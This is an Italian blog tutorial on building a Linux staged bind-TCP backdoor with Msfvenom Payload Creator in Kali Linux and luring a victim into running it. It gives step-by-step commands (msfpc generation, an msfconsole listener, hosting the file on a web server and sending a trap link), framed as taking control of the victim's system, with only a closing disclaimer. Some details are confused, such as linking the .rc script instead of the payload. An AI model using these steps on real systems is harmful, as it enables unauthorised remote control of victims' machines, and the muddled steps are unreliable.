
Creare linux-shell-staged-bind-tcp backdoor
In questo articolo vi spiegherò come creare linux-shell-staged-bind-tcp backdoor, che vi permetterà di aggirare le misure di sicurezza di un sistema per assumerne il pieno controllo. Il programma che utilizzeremo per creare la nostra backdoor sarà Msfvenom Payload Creator, incluso nel sistema operativo di Penetration Test Kali Linux, e specializzato nella creazione di numerosissime backdoor di cui potremo avvalerci per entrare in un sistema remoto. Nel nostro caso, una volta creata la backdoor di cui stiamo parlando in questo articolo, basterà formare un link sul quale la vittima cliccherà e cadrà nella nostra pericolosa trappola; da quel momento in poi il suo sistema sarà, a sua insaputa, nelle nostre mani. Ne approfitto per dire che ogni qualvolta vi ritrovate link poco sicuri e poco affidabili sui vostri cellulari o PC, dovete assolutamente NON APRIRLI, in quanto potrebbero seriamente mettere a rischio la sicurezza del sistema e quindi dei vostri dati più sensibili (carte di credito, conti bancari online, info riservate); è bene anche eseguire periodicamente una scansione, con buoni antivirus, di tutti i vostri dispositivi, per scongiurare la presenza di possibili falle o problemi generici di sicurezza. Ma adesso ritorniamo a noi.
Innanzitutto apriamo il programma Msfvenom Payload Creator, che si trova nel percorso Applicazioni>Strumenti di Exploiting>msf payload creator.
Una volta startato il programma digitiamo il comando:
/usr/bin/msfpc elf bind [nostro indirizzo IP] [porta locale]
dove al posto di “[nostro indirizzo IP]” andremo a inserire il nostro IP, ricavabile mediante il comando “ifconfig” su un nuovo terminale, mentre al posto di “[porta locale]” inseriremo la nostra porta, ottenibile mediante il comando “nmap [nostro indirizzo IP]”, sempre su un nuovo terminale; ricordo, tuttavia, che la porta più consigliata è la 443.
Dopo l’esecuzione del precedente comando (/usr/bin/msfpc elf bind [nostro indirizzo IP] [porta locale]), Msfvenom Payload Creator creerà due file (linux-shell-staged-bind-tcp-443.elf e linux-shell-staged-bind-tcp-443-elf.rc) che possiamo trovare nel percorso “Home”.
Adesso digitiamo il comando: msfconsole -q -r ‘/root/linux-shell-staged-bind-tcp-443-elf.rc’
questo comando metterà in ascolto un terminale di msfconsole in attesa che la vittima cada nella trappola.
Nel frattempo noi dovremo trasferire il file “linux-shell-staged-bind-tcp-443-elf.rc” nel percorso “computer/var/www/html”.
A questo punto possiamo creare il link che dobbiamo inviare e far aprire alla vittima; il link si articola in questo modo:
“[nostro indirizzo IP]/linux-shell-staged-bind-tcp-443-elf.rc”
Quando il target lo aprirà, automaticamente si avvierà un download (sul PC della vittima) della backdoor che abbiamo creato; nel momento in cui la backdoor verrà aperta si stabilirà una connessione con il nostro terminale di Metasploit Framework in ascolto; a quel punto avremo un ampio potere sulla macchina remota.
Se avete qualche dubbio con i comandi, potete digitare “help” sul terminale di Msfvenom Payload Creator e vi verranno elencate tutte le azioni che potete eseguire.
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI